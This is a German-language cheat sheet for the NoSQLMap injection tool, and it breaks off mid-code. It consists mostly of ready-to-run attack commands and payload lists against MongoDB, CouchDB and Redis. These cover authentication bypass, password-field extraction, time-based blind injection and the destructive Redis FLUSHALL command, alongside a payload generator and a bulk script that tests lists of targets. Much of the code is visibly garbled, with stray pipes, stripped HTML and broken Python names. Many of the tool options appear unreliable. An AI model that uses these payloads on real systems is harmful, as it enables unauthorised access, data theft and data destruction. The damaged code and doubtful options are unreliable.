Zum Inhalt

NoSQLMap Cheat Sheet

generieren

Überblick

NoSQLMap ist ein umfassendes Open-Source-Python-Tool, das speziell für das Auditing und das Angreifen von NoSQL-Datenbanken entwickelt wurde und die wachsenden Sicherheitsbedenken in modernen Datenbankumgebungen anspricht, mit denen herkömmliche SQL-Injektionstools nicht umgehen können. NoSQLMap unterstützt mehrere NoSQL-Datenbanktypen wie MongoDB, CouchDB und verschiedene dokumentorientierte Datenbanken, die Penetrationsprüfer und Sicherheitsforscher mit spezialisierten Fähigkeiten zur Identifizierung und Ausnutzung von NoSQL-Injektionslücken bieten. Das Werkzeug ist für Organisationen, die NoSQL-Technologien einsetzen, wesentlich geworden, da für diese neueren Datenbankparadigmen herkömmliche Datenbanksicherheitstests unzureichend sind.

Die Kernkraft von NoSQLMap liegt in seiner Fähigkeit, verschiedene Arten von NoSQL Injektionsunfähigkeiten automatisch zu erkennen und auszunutzen, einschließlich Authentifizierungsbypass, Datenextraktion und blinden Injektionsangriffen. Im Gegensatz zu herkömmlichen SQL-Injektionstools, die auf SQL-Syntax basieren, versteht NoSQLMap die einzigartigen Abfragestrukturen und Datenformate, die von NoSQL-Datenbanken verwendet werden, wie z.B. JSON-basierte Abfragen in MongoDB oder Key-value-Operationen in Redis. Dieses spezialisierte Wissen ermöglicht es dem Werkzeug, gezielte Nutzlasten zu handhaben, die NoSQL-Anwendungen für Sicherheitsschwächen effektiv testen können, die sonst unentdeckt werden könnten.

Die Vielseitigkeit von NoSQLMap reicht über eine einfache Schwachstelle-Erkennung hinaus, um umfassende Datenbankaufzählungen, Datenextraktionsmöglichkeiten und erweiterte Verwertungstechniken einzubeziehen. Das Tool kann automatisch Datenbankschemas identifizieren, sensible Daten extrahieren und sogar Privileg Eskalationsangriffe ausführen, wenn Schwachstellen entdeckt werden. Seine modulare Architektur ermöglicht eine einfache Erweiterung, um neue NoSQL-Datenbanktypen und Angriffsvektoren zu unterstützen, wodurch es eine zukunftssichere Lösung für NoSQL-Sicherheitstests ist. Die Fähigkeit des Tools, mit bestehenden Penetrationstests zu integrieren und detaillierte Berichte zu erstellen, macht es für Sicherheitsexperten, die umfassende Datensicherheitsbewertungen durchführen, unschätzbar.

Installation

Python Installation

Installieren von NoSQLMap mit Python Paketmanager:

```bash

Install from PyPI

pip install nosqlmap

Alternative: Install from GitHub

pip install git+https://github.com/codingo/NoSQLMap.git

Install with development dependencies

pip install nosqlmap[dev]

Verify installation

nosqlmap --version nosqlmap --help

Install in virtual environment (recommended)

python3 -m venv nosqlmap-env source nosqlmap-env/bin/activate pip install nosqlmap ```_

Quelle Installation

Installieren von NoSQLMap aus Quellcode:

```bash

Clone repository

git clone https://github.com/codingo/NoSQLMap.git cd NoSQLMap

Install dependencies

pip install -r requirements.txt

Install in development mode

pip install -e .

Alternative: Run directly

python nosqlmap.py --help

Make executable

chmod +x nosqlmap.py sudo ln -s $(pwd)/nosqlmap.py /usr/local/bin/nosqlmap

Verify installation

nosqlmap --version ```_

Docker Installation

```bash

Create NoSQLMap Docker environment

cat > Dockerfile << 'EOF' FROM python:3.9-slim

RUN apt-get update && apt-get install -y \ git curl wget \ && rm -rf /var/lib/apt/lists/*

Install NoSQLMap

RUN pip install nosqlmap

Install additional tools

RUN pip install pymongo redis

WORKDIR /nosqlmap CMD ["nosqlmap", "--help"] EOF

Build container

docker build -t nosqlmap-security .

Run NoSQLMap

docker run -it nosqlmap-security nosqlmap --help

Run with volume mount for results

docker run -it -v $(pwd)/results:/results nosqlmap-security ```_

Dependancen Installation

```bash

Install required Python packages

pip install requests pip install pymongo pip install redis pip install urllib3 pip install colorama

Install optional dependencies

pip install python-nmap # For network scanning pip install dnspython # For DNS resolution pip install pycrypto # For encryption support

Install database drivers

pip install motor # Async MongoDB driver pip install aioredis # Async Redis driver pip install couchdb # CouchDB driver

Verify dependencies

python -c "import nosqlmap; print('NoSQLMap imported successfully')" ```_

Basisnutzung

Zielentdeckung

NoSQL Datenbankziele entdecken:

```bash

Basic target scanning

nosqlmap --target http://example.com/api/users

Scan with custom headers

nosqlmap --target http://example.com/api/users \ --headers "Authorization: Bearer token123"

Scan with cookies

nosqlmap --target http://example.com/api/users \ --cookies "session=abc123; auth=xyz789"

Scan with proxy

nosqlmap --target http://example.com/api/users \ --proxy http://127.0.0.1:8080

Scan with custom user agent

nosqlmap --target http://example.com/api/users \ --user-agent "Mozilla/5.0 Custom Scanner"

Multiple target scanning

nosqlmap --target-list targets.txt ```_

Basic Injection Testing

Durchführung grundlegender NoSQL Injektionstests:

```bash

Test for authentication bypass

nosqlmap --target http://example.com/login \ --attack auth-bypass \ --data "username=admin&password;=test"

Test for data extraction

nosqlmap --target http://example.com/api/users \ --attack extract \ --parameter id

Test for blind injection

nosqlmap --target http://example.com/api/search \ --attack blind \ --parameter query

Test specific parameter

nosqlmap --target http://example.com/api/users \ --parameter id \ --attack all

Test with POST data

nosqlmap --target http://example.com/api/login \ --method POST \ --data '\\{"username":"admin","password":"test"\\}' \ --content-type "application/json" ```_

Datenbankaufzählung

Enumerieren von NoSQL-Datenbankinformationen:

```bash

Enumerate database structure

nosqlmap --target http://example.com/api/users \ --attack enumerate \ --enumerate-all

Enumerate collections/tables

nosqlmap --target http://example.com/api/users \ --attack enumerate \ --enumerate-collections

Enumerate users and privileges

nosqlmap --target http://example.com/api/users \ --attack enumerate \ --enumerate-users

Enumerate database version

nosqlmap --target http://example.com/api/users \ --attack enumerate \ --enumerate-version

Custom enumeration queries

nosqlmap --target http://example.com/api/users \ --attack enumerate \ --custom-query "db.stats()" ```_

Erweiterte Funktionen

MongoDB-Specific Attacks

Spezialangriffe für Mongo Datenbanken:

```bash

MongoDB authentication bypass

nosqlmap --target http://example.com/login \ --attack mongodb-auth-bypass \ --data "username=admin&password;=test"

MongoDB injection with $where operator

nosqlmap --target http://example.com/api/search \ --attack mongodb-where \ --parameter query \ --payload "function()\\{return true;\\}"

MongoDB $regex injection

nosqlmap --target http://example.com/api/users \ --attack mongodb-regex \ --parameter name \ --payload ".*"

MongoDB $ne (not equal) injection

nosqlmap --target http://example.com/api/users \ --attack mongodb-ne \ --parameter status \ --payload "inactive"

MongoDB aggregation injection

nosqlmap --target http://example.com/api/analytics \ --attack mongodb-aggregation \ --parameter pipeline ```_

CouchDB-Specific Attacks

Spezialangriffe für Couch Datenbanken:

```bash

CouchDB view injection

nosqlmap --target http://example.com:5984/database/_design/app/_view/users \ --attack couchdb-view \ --parameter key

CouchDB map-reduce injection

nosqlmap --target http://example.com:5984/database/_temp_view \ --attack couchdb-mapreduce \ --data '\\{"map":"function(doc)\\{emit(doc._id,doc);\\}"\\}'

CouchDB admin privilege escalation

nosqlmap --target http://example.com:5984/_config \ --attack couchdb-admin \ --credentials admin:password

CouchDB database enumeration

nosqlmap --target http://example.com:5984/_all_dbs \ --attack couchdb-enum

CouchDB document extraction

nosqlmap --target http://example.com:5984/database/all_docs \ --attack couchdb-extract \ --parameter include_docs=true ```

Redis-Specific Angriffe

Spezialisierte Angriffe auf Redis Datenbanken:

```bash

Redis command injection

nosqlmap --target redis://example.com:6379 \ --attack redis-command \ --payload "FLUSHALL"

Redis Lua script injection

nosqlmap --target redis://example.com:6379 \ --attack redis-lua \ --payload "return redis.call('keys','*')"

Redis configuration extraction

nosqlmap --target redis://example.com:6379 \ --attack redis-config

Redis key enumeration

nosqlmap --target redis://example.com:6379 \ --attack redis-keys \ --pattern "password"

Redis data extraction

nosqlmap --target redis://example.com:6379 \ --attack redis-extract \ --key-pattern "user:*" ```_

Blinde Injektionstechniken

Advanced Blind Injektionstests:

```bash

Time-based blind injection

nosqlmap --target http://example.com/api/search \ --attack time-blind \ --parameter query \ --time-delay 5

Boolean-based blind injection

nosqlmap --target http://example.com/api/users \ --attack boolean-blind \ --parameter id \ --true-condition "user found" \ --false-condition "user not found"

Error-based blind injection

nosqlmap --target http://example.com/api/users \ --attack error-blind \ --parameter id \ --error-pattern "MongoError"

Content-length based blind injection

nosqlmap --target http://example.com/api/search \ --attack length-blind \ --parameter query \ --length-threshold 100

Custom blind injection

nosqlmap --target http://example.com/api/users \ --attack custom-blind \ --parameter id \ --custom-payload "\\{'$where':'this.username.length>5'\\}" ```_

Datenextraktion

Fortgeschrittene Methoden der Datenextraktion:

```bash

Extract all data from collection

nosqlmap --target http://example.com/api/users \ --attack extract-all \ --collection users \ --output-format json

Extract specific fields

nosqlmap --target http://example.com/api/users \ --attack extract-fields \ --fields "username,email,password" \ --collection users

Extract with conditions

nosqlmap --target http://example.com/api/users \ --attack extract-conditional \ --condition "role=admin" \ --collection users

Extract with pagination

nosqlmap --target http://example.com/api/users \ --attack extract-paginated \ --page-size 100 \ --max-pages 10

Extract binary data

nosqlmap --target http://example.com/api/files \ --attack extract-binary \ --field file_data \ --output-dir ./extracted_files ```_

Automatisierungsskripte

Umfassende NoSQL Bewertung

```python

!/usr/bin/env python3

Comprehensive NoSQL security assessment

import subprocess import json import time from datetime import datetime import requests from urllib.parse import urlparse

class NoSQLSecurityAssessment: def init(self, target_url, output_dir="nosql_assessment"): self.target_url = target_url self.output_dir = output_dir self.results = \\{\\} self.vulnerabilities = []

    # Create output directory
    import os
    os.makedirs(output_dir, exist_ok=True)

def run_basic_tests(self):
    """Run basic NoSQL injection tests"""
    print("Running basic NoSQL injection tests...")

    basic_tests = [
        \\\\{
            "name": "Authentication Bypass",
            "attack": "auth-bypass",
            "description": "Test for authentication bypass vulnerabilities"
        \\\\},
        \\\\{
            "name": "Data Extraction",
            "attack": "extract",
            "description": "Test for data extraction vulnerabilities"
        \\\\},
        \\\\{
            "name": "Blind Injection",
            "attack": "blind",
            "description": "Test for blind injection vulnerabilities"
        \\\\},
        \\\\{
            "name": "Enumeration",
            "attack": "enumerate",
            "description": "Test for information disclosure"
        \\\\}
    ]

    for test in basic_tests:
        print(f"Running \\\\{test['name']\\\\} test...")

        cmd = [
            "nosqlmap",
            "--target", self.target_url,
            "--attack", test["attack"],
            "--output-format", "json",
            "--output-file", f"\\\\{self.output_dir\\\\}/\\\\{test['attack']\\\\}_results.json"
        ]

        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)

            test_result = \\\\{
                "test_name": test["name"],
                "attack_type": test["attack"],
                "command": " ".join(cmd),
                "return_code": result.returncode,
                "stdout": result.stdout,
                "stderr": result.stderr,
                "timestamp": datetime.now().isoformat()
            \\\\}

            if result.returncode == 0:
                test_result["status"] = "completed"
                # Parse results for vulnerabilities
                self.parse_test_results(test["attack"], result.stdout)
            else:
                test_result["status"] = "failed"

            self.results[test["attack"]] = test_result

        except subprocess.TimeoutExpired:
            print(f"Test \\\\{test['name']\\\\} timed out")
            self.results[test["attack"]] = \\\\{
                "test_name": test["name"],
                "status": "timeout",
                "timestamp": datetime.now().isoformat()
            \\\\}

        except Exception as e:
            print(f"Error running test \\\\{test['name']\\\\}: \\\\{e\\\\}")
            self.results[test["attack"]] = \\\\{
                "test_name": test["name"],
                "status": "error",
                "error": str(e),
                "timestamp": datetime.now().isoformat()
            \\\\}

        time.sleep(2)  # Rate limiting

def run_database_specific_tests(self):
    """Run database-specific tests"""
    print("Running database-specific tests...")

    # Detect database type first
    db_type = self.detect_database_type()

    if db_type == "mongodb":
        self.run_mongodb_tests()
    elif db_type == "couchdb":
        self.run_couchdb_tests()
    elif db_type == "redis":
        self.run_redis_tests()
    else:
        print("Database type not detected, running generic tests")
        self.run_generic_tests()

def detect_database_type(self):
    """Detect NoSQL database type"""
    print("Detecting database type...")

    # Check for MongoDB indicators
    mongodb_indicators = [
        "/api/",
        "ObjectId",
        "mongodb://",
        "27017"
    ]

    # Check for CouchDB indicators
    couchdb_indicators = [
        "_design/",
        "_view/",
        "5984",
        "couchdb"
    ]

    # Check for Redis indicators
    redis_indicators = [
        "redis://",
        "6379",
        "REDIS"
    ]

    try:
        response = requests.get(self.target_url, timeout=10)
        content = response.text.lower()
        headers = response.headers

        # Check headers and content for indicators
        if any(indicator.lower() in content or indicator.lower() in str(headers) for indicator in mongodb_indicators):
            return "mongodb"
        elif any(indicator.lower() in content or indicator.lower() in str(headers) for indicator in couchdb_indicators):
            return "couchdb"
        elif any(indicator.lower() in content or indicator.lower() in str(headers) for indicator in redis_indicators):
            return "redis"

    except Exception as e:
        print(f"Error detecting database type: \\\\{e\\\\}")

    return "unknown"

def run_mongodb_tests(self):
    """Run MongoDB-specific tests"""
    print("Running MongoDB-specific tests...")

    mongodb_tests = [
        "mongodb-auth-bypass",
        "mongodb-where",
        "mongodb-regex",
        "mongodb-ne",
        "mongodb-aggregation"
    ]

    for test in mongodb_tests:
        cmd = [
            "nosqlmap",
            "--target", self.target_url,
            "--attack", test,
            "--output-format", "json"
        ]

        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=180)
            self.results[f"mongodb_\\\\{test\\\\}"] = \\\\{
                "attack_type": test,
                "return_code": result.returncode,
                "output": result.stdout,
                "timestamp": datetime.now().isoformat()
            \\\\}

            if result.returncode == 0:
                self.parse_test_results(test, result.stdout)

        except Exception as e:
            print(f"Error running MongoDB test \\\\{test\\\\}: \\\\{e\\\\}")

def run_couchdb_tests(self):
    """Run CouchDB-specific tests"""
    print("Running CouchDB-specific tests...")

    couchdb_tests = [
        "couchdb-view",
        "couchdb-mapreduce",
        "couchdb-admin",
        "couchdb-enum"
    ]

    for test in couchdb_tests:
        cmd = [
            "nosqlmap",
            "--target", self.target_url,
            "--attack", test,
            "--output-format", "json"
        ]

        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=180)
            self.results[f"couchdb_\\\\{test\\\\}"] = \\\\{
                "attack_type": test,
                "return_code": result.returncode,
                "output": result.stdout,
                "timestamp": datetime.now().isoformat()
            \\\\}

            if result.returncode == 0:
                self.parse_test_results(test, result.stdout)

        except Exception as e:
            print(f"Error running CouchDB test \\\\{test\\\\}: \\\\{e\\\\}")

def run_redis_tests(self):
    """Run Redis-specific tests"""
    print("Running Redis-specific tests...")

    redis_tests = [
        "redis-command",
        "redis-lua",
        "redis-config",
        "redis-keys"
    ]

    for test in redis_tests:
        cmd = [
            "nosqlmap",
            "--target", self.target_url,
            "--attack", test,
            "--output-format", "json"
        ]

        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=180)
            self.results[f"redis_\\\\{test\\\\}"] = \\\\{
                "attack_type": test,
                "return_code": result.returncode,
                "output": result.stdout,
                "timestamp": datetime.now().isoformat()
            \\\\}

            if result.returncode == 0:
                self.parse_test_results(test, result.stdout)

        except Exception as e:
            print(f"Error running Redis test \\\\{test\\\\}: \\\\{e\\\\}")

def parse_test_results(self, test_type, output):
    """Parse test results for vulnerabilities"""

    # Look for vulnerability indicators in output
    vulnerability_indicators = [
        "VULNERABLE",
        "INJECTION FOUND",
        "BYPASS SUCCESSFUL",
        "DATA EXTRACTED",
        "AUTHENTICATION BYPASSED"
    ]

    if any(indicator in output.upper() for indicator in vulnerability_indicators):
        vulnerability = \\\\{
            "test_type": test_type,
            "severity": self.determine_severity(test_type),
            "description": f"NoSQL injection vulnerability found in \\\\{test_type\\\\} test",
            "evidence": output[:500],  # First 500 chars as evidence
            "timestamp": datetime.now().isoformat()
        \\\\}

        self.vulnerabilities.append(vulnerability)

def determine_severity(self, test_type):
    """Determine vulnerability severity based on test type"""

    high_severity = ["auth-bypass", "extract", "mongodb-auth-bypass"]
    medium_severity = ["blind", "enumerate", "mongodb-where"]

    if test_type in high_severity:
        return "HIGH"
    elif test_type in medium_severity:
        return "MEDIUM"
    else:
        return "LOW"

def generate_report(self):
    """Generate comprehensive assessment report"""

    report = \\\\{
        "assessment_info": \\\\{
            "target": self.target_url,
            "timestamp": datetime.now().isoformat(),
            "total_tests": len(self.results),
            "vulnerabilities_found": len(self.vulnerabilities)
        \\\\},
        "test_results": self.results,
        "vulnerabilities": self.vulnerabilities,
        "summary": \\\\{
            "high_severity": len([v for v in self.vulnerabilities if v["severity"] == "HIGH"]),
            "medium_severity": len([v for v in self.vulnerabilities if v["severity"] == "MEDIUM"]),
            "low_severity": len([v for v in self.vulnerabilities if v["severity"] == "LOW"])
        \\\\}
    \\\\}

    # Save JSON report
    with open(f"\\\\{self.output_dir\\\\}/assessment_report.json", 'w') as f:
        json.dump(report, f, indent=2)

    # Generate HTML report
    self.generate_html_report(report)

    print(f"Assessment completed. Report saved to \\\\{self.output_dir\\\\}/")
    print(f"Vulnerabilities found: \\\\{len(self.vulnerabilities)\\\\}")

    return report

def generate_html_report(self, report):
    """Generate HTML assessment report"""

    html_template = """
NoSQL Security Assessment Report

NoSQL Security Assessment Report

Target: \\\\{target\\\\}

Assessment Date: \\\\{timestamp\\\\}

Executive Summary

Total Tests Performed: \\\\{total_tests\\\\}

Vulnerabilities Found: \\\\{total_vulnerabilities\\\\}

  • High Severity: \\\\{high_severity\\\\}
  • Medium Severity: \\\\{medium_severity\\\\}
  • Low Severity: \\\\{low_severity\\\\}

Vulnerabilities

\\\\{vulnerabilities_html\\\\}

Test Results

\\\\{test_results_html\\\\}
    """

    # Generate vulnerabilities HTML
    vulnerabilities_html = ""
    for vuln in report["vulnerabilities"]:
        vulnerabilities_html += f"""
        <div class="vulnerability \\\\{vuln['severity'].lower()\\\\}">
            <h3>\\\\{vuln['test_type']\\\\} - \\\\{vuln['severity']\\\\} Severity</h3>
            <p>\\\\{vuln['description']\\\\}</p>
            <p><strong>Evidence:</strong> \\\\{vuln['evidence']\\\\}</p>
            <p><strong>Timestamp:</strong> \\\\{vuln['timestamp']\\\\}</p>
        </div>
        """

    # Generate test results HTML
    test_results_html = ""
    for test_name, result in report["test_results"].items():
        test_results_html += f"""
        <div class="test-result">
            <h3>\\\\{test_name\\\\}</h3>
            <p>Status: \\\\{result.get('status', 'Unknown')\\\\}</p>
            <p>Return Code: \\\\{result.get('return_code', 'N/A')\\\\}</p>
            <p>Timestamp: \\\\{result.get('timestamp', 'N/A')\\\\}</p>
        </div>
        """

    html_content = html_template.format(
        target=report["assessment_info"]["target"],
        timestamp=report["assessment_info"]["timestamp"],
        total_tests=report["assessment_info"]["total_tests"],
        total_vulnerabilities=report["assessment_info"]["vulnerabilities_found"],
        high_severity=report["summary"]["high_severity"],
        medium_severity=report["summary"]["medium_severity"],
        low_severity=report["summary"]["low_severity"],
        vulnerabilities_html=vulnerabilities_html,
        test_results_html=test_results_html
    )

    with open(f"\\\\{self.output_dir\\\\}/assessment_report.html", 'w') as f:
        f.write(html_content)

Usage

if name == "main": target_url = "http://example.com/api/users"

assessment = NoSQLSecurityAssessment(target_url)

# Run comprehensive assessment
assessment.run_basic_tests()
assessment.run_database_specific_tests()

# Generate report
report = assessment.generate_report()

```_

Automatische Payload-Generation

```python

!/usr/bin/env python3

NoSQL injection payload generator

import json import base64 import urllib.parse

class NoSQLPayloadGenerator: def init(self): self.payloads = \\{ "mongodb": [], "couchdb": [], "redis": [], "generic": [] \\} self.generate_all_payloads()

def generate_mongodb_payloads(self):
    """Generate MongoDB-specific payloads"""

    # Authentication bypass payloads
    auth_bypass = [
        \\\\{"username": \\\\{"$ne": ""\\\\}, "password": \\\\{"$ne": ""\\\\}\\\\},
        \\\\{"username": \\\\{"$regex": ".*"\\\\}, "password": \\\\{"$regex": ".*"\\\\}\\\\},
        \\\\{"username": \\\\{"$exists": True\\\\}, "password": \\\\{"$exists": True\\\\}\\\\},
        \\\\{"username": \\\\{"$gt": ""\\\\}, "password": \\\\{"$gt": ""\\\\}\\\\},
        \\\\{"$or": [\\\\{"username": "admin"\\\\}, \\\\{"username": \\\\{"$ne": ""\\\\}\\\\}]\\\\},
        \\\\{"username": \\\\{"$in": ["admin", "administrator", "root"]\\\\}\\\\}
    ]

    # Data extraction payloads
    data_extraction = [
        \\\\{"$where": "return true"\\\\},
        \\\\{"$where": "function()\\\\{return this.username.length > 0\\\\}"\\\\},
        \\\\{"$where": "function()\\\\{return JSON.stringify(this)\\\\}"\\\\},
        \\\\{"username": \\\\{"$regex": "^a.*"\\\\}\\\\},
        \\\\{"password": \\\\{"$regex": ".*"\\\\}\\\\},
        \\\\{"$expr": \\\\{"$gt": [\\\\{"$strLenCP": "$password"\\\\}, 0]\\\\}\\\\}
    ]

    # Blind injection payloads
    blind_injection = [
        \\\\{"$where": "sleep(5000)"\\\\},
        \\\\{"$where": "function()\\\\{if(this.username=='admin')sleep(5000)\\\\}"\\\\},
        \\\\{"username": \\\\{"$regex": "^admin.*"\\\\}, "$where": "sleep(1000)"\\\\},
        \\\\{"$expr": \\\\{"$cond": [\\\\{"$eq": ["$username", "admin"]\\\\}, \\\\{"$literal": True\\\\}, \\\\{"$literal": False\\\\}]\\\\}\\\\}
    ]

    self.payloads["mongodb"] = \\\\{
        "auth_bypass": auth_bypass,
        "data_extraction": data_extraction,
        "blind_injection": blind_injection
    \\\\}

def generate_couchdb_payloads(self):
    """Generate CouchDB-specific payloads"""

    # View injection payloads
    view_injection = [
        \\\\{"key": ["admin", \\\\{"$gt": null\\\\}]\\\\},
        \\\\{"startkey": "admin", "endkey": "admin\ufff0"\\\\},
        \\\\{"key": \\\\{"$regex": ".*admin.*"\\\\}\\\\},
        \\\\{"include_docs": True, "key": \\\\{"$ne": null\\\\}\\\\}
    ]

    # Map-reduce injection payloads
    mapreduce_injection = [
        \\\\{
            "map": "function(doc)\\\\{if(doc.username=='admin')emit(doc._id,doc);\\\\}"
        \\\\},
        \\\\{
            "map": "function(doc)\\\\{emit(doc._id,doc);\\\\}",
            "reduce": "function(keys,values)\\\\{return values;\\\\}"
        \\\\}
    ]

    self.payloads["couchdb"] = \\\\{
        "view_injection": view_injection,
        "mapreduce_injection": mapreduce_injection
    \\\\}

def generate_redis_payloads(self):
    """Generate Redis-specific payloads"""

    # Command injection payloads
    command_injection = [
        "FLUSHALL",
        "CONFIG GET *",
        "INFO",
        "KEYS *",
        "EVAL \"return redis.call('keys','*')\" 0",
        "SCRIPT LOAD \"return redis.call('flushall')\""
    ]

    # Lua script injection payloads
    lua_injection = [
        "return redis.call('keys','*')",
        "return redis.call('config','get','*')",
        "return redis.call('info')",
        "for i=1,1000000 do end; return 'done'"
    ]

    self.payloads["redis"] = \\\\{
        "command_injection": command_injection,
        "lua_injection": lua_injection
    \\\\}

def generate_generic_payloads(self):
    """Generate generic NoSQL payloads"""

    # Generic injection patterns
    generic_patterns = [
        "'; return true; //",
        "\"; return true; //",

| "' | | '1'=='1", | | "\" | | \"1\"==\"1\"", | "'; return this; //", "\"; return this; //", "true, true", "false, true", "1, 1", "0, 1" ]

    # JSON injection payloads
    json_injection = [
        \\\\{"$ne": ""\\\\},
        \\\\{"$gt": ""\\\\},
        \\\\{"$regex": ".*"\\\\},
        \\\\{"$exists": True\\\\},
        \\\\{"$in": ["admin", "user", "guest"]\\\\},
        \\\\{"$or": [\\\\{"username": "admin"\\\\}, \\\\{"password": \\\\{"$ne": ""\\\\}\\\\}]\\\\}
    ]

    self.payloads["generic"] = \\\\{
        "patterns": generic_patterns,
        "json_injection": json_injection
    \\\\}

def generate_all_payloads(self):
    """Generate all payload types"""
    self.generate_mongodb_payloads()
    self.generate_couchdb_payloads()
    self.generate_redis_payloads()
    self.generate_generic_payloads()

def encode_payload(self, payload, encoding_type="url"):
    """Encode payload for different contexts"""

    if isinstance(payload, dict):
        payload_str = json.dumps(payload)
    else:
        payload_str = str(payload)

    if encoding_type == "url":
        return urllib.parse.quote(payload_str)
    elif encoding_type == "base64":
        return base64.b64encode(payload_str.encode()).decode()
    elif encoding_type == "double_url":
        return urllib.parse.quote(urllib.parse.quote(payload_str))
    else:
        return payload_str

def generate_test_cases(self, target_db="mongodb", encoding="url"):
    """Generate test cases for specific database"""

    test_cases = []

    if target_db in self.payloads:
        for category, payloads in self.payloads[target_db].items():
            for payload in payloads:
                test_case = \\\\{
                    "database": target_db,
                    "category": category,
                    "payload": payload,
                    "encoded_payload": self.encode_payload(payload, encoding),
                    "description": f"\\\\{target_db\\\\} \\\\{category\\\\} payload"
                \\\\}
                test_cases.append(test_case)

    return test_cases

def export_payloads(self, output_file="nosql_payloads.json"):
    """Export all payloads to file"""

    with open(output_file, 'w') as f:
        json.dump(self.payloads, f, indent=2)

    print(f"Payloads exported to \\\\{output_file\\\\}")

def generate_wordlist(self, target_db="all", output_file="nosql_wordlist.txt"):
    """Generate wordlist for fuzzing"""

    wordlist = []

    if target_db == "all":
        databases = self.payloads.keys()
    else:
        databases = [target_db] if target_db in self.payloads else []

    for db in databases:
        for category, payloads in self.payloads[db].items():
            for payload in payloads:
                if isinstance(payload, dict):
                    wordlist.append(json.dumps(payload))
                else:
                    wordlist.append(str(payload))

    with open(output_file, 'w') as f:
        for item in wordlist:
            f.write(item + '\n')

    print(f"Wordlist generated: \\\\{output_file\\\\}")
    return wordlist

Usage

if name == "main": generator = NoSQLPayloadGenerator()

# Generate test cases for MongoDB
mongodb_tests = generator.generate_test_cases("mongodb", "url")
print(f"Generated \\\\{len(mongodb_tests)\\\\} MongoDB test cases")

# Export all payloads
generator.export_payloads()

# Generate wordlist
generator.generate_wordlist()

```_

Massenzielprüfung

```bash

!/bin/bash

Bulk NoSQL target testing script

TARGET_FILE="$1" OUTPUT_DIR="bulk_nosql_results_$(date +%Y%m%d_%H%M%S)"

if [ -z "$TARGET_FILE" ]; then echo "Usage: $0 " echo "Target file should contain one URL per line" exit 1 fi

if [ ! -f "$TARGET_FILE" ]; then echo "Error: Target file not found: $TARGET_FILE" exit 1 fi

echo "Starting bulk NoSQL testing..." echo "Target file: $TARGET_FILE" echo "Output directory: $OUTPUT_DIR"

Create output directory

mkdir -p "$OUTPUT_DIR"

Initialize summary

echo "Target,Status,Vulnerabilities,Test_Time" > "$OUTPUT_DIR/summary.csv"

Process each target

while IFS= read -r target; do # Skip empty lines and comments | if [[ -z "$target" | | "$target" =~ ^# ]]; then | continue fi

echo "Testing target: $target"

# Create target-specific directory

| target_dir="$OUTPUT_DIR/$(echo "$target" | sed 's | [^a-zA-Z0-9] | _ | g')" | mkdir -p "$target_dir"

start_time=$(date +%s)

# Run basic tests
echo "Running basic NoSQL injection tests..."

# Authentication bypass test
nosqlmap --target "$target" \
         --attack auth-bypass \
         --output-format json \
         --output-file "$target_dir/auth_bypass.json" \
         --timeout 60 > "$target_dir/auth_bypass.log" 2>&1

# Data extraction test
nosqlmap --target "$target" \
         --attack extract \
         --output-format json \
         --output-file "$target_dir/data_extract.json" \
         --timeout 60 > "$target_dir/data_extract.log" 2>&1

# Blind injection test
nosqlmap --target "$target" \
         --attack blind \
         --output-format json \
         --output-file "$target_dir/blind_injection.json" \
         --timeout 60 > "$target_dir/blind_injection.log" 2>&1

# Enumeration test
nosqlmap --target "$target" \
         --attack enumerate \
         --output-format json \
         --output-file "$target_dir/enumeration.json" \
         --timeout 60 > "$target_dir/enumeration.log" 2>&1

end_time=$(date +%s)
test_duration=$((end_time - start_time))

# Analyze results
vulnerability_count=0
status="TESTED"

# Check for vulnerabilities in output files
for result_file in "$target_dir"/*.json; do
    if [ -f "$result_file" ]; then

| if grep -q "VULNERABLE\ | INJECTION\ | BYPASS" "$result_file" 2>/dev/null; then | vulnerability_count=$((vulnerability_count + 1)) status="VULNERABLE" fi fi done

# Check for errors

| if grep -q "ERROR\ | TIMEOUT\ | FAILED" "$target_dir"/*.log 2>/dev/null; then | if [ "$status" != "VULNERABLE" ]; then status="ERROR" fi fi

# Update summary
echo "$target,$status,$vulnerability_count,$\\\\{test_duration\\\\}s" >> "$OUTPUT_DIR/summary.csv"

echo "Completed testing $target ($\\\\{test_duration\\\\}s, $vulnerability_count vulnerabilities)"

# Rate limiting
sleep 5

done < "$TARGET_FILE"

Generate final report

echo "Generating final report..."

cat > "$OUTPUT_DIR/bulk_test_report.html" << EOF

Bulk NoSQL Testing Report

Bulk NoSQL Testing Report

Generated: $(date)

Total targets tested: $(wc -l < "$TARGET_FILE")

Summary

EOF # Add table rows from CSV tail -n +2 "$OUTPUT_DIR/summary.csv"|while IFS=, read -r target status vulns duration; do css_class=$(echo "$status"|tr '[:upper:]' '[:lower:]') echo " " >> "$OUTPUT_DIR/bulk_test_report.html" echo " " >> "$OUTPUT_DIR/bulk_test_report.html" echo " " >> "$OUTPUT_DIR/bulk_test_report.html" echo " " >> "$OUTPUT_DIR/bulk_test_report.html" echo " " >> "$OUTPUT_DIR/bulk_test_report.html" echo " " >> "$OUTPUT_DIR/bulk_test_report.html" done cat >> "$OUTPUT_DIR/bulk_test_report.html" << EOF
Target Status Vulnerabilities Test Duration
$target$status$vulns$duration

EOF

echo "Bulk testing completed!" echo "Results saved in: $OUTPUT_DIR" echo "Summary report: $OUTPUT_DIR/bulk_test_report.html"

Print summary statistics

echo "" echo "Summary Statistics:" echo "===================" total_targets=$(tail -n +2 "$OUTPUT_DIR/summary.csv"|wc -l) vulnerable_targets=$(tail -n +2 "$OUTPUT_DIR/summary.csv"|grep -c "VULNERABLE") error_targets=$(tail -n +2 "$OUTPUT_DIR/summary.csv"|grep -c "ERROR") tested_targets=$(tail -n +2 "$OUTPUT_DIR/summary.csv"|grep -c "TESTED")

echo "Total targets: $total_targets" echo "Vulnerable targets: $vulnerable_targets" echo "Error targets: $error_targets" echo "Successfully tested: $tested_targets"

if [ "$total_targets" -gt 0 ]; then vulnerability_rate=$((vulnerable_targets * 100 / total_targets)) echo "Vulnerability rate: $vulnerability_rate%" fi ```_

Integrationsbeispiele

Integration von Burp Suite

```python

!/usr/bin/env python3

NoSQLMap integration with Burp Suite

import requests import json import base64 from urllib.parse import urlparse, parse_qs

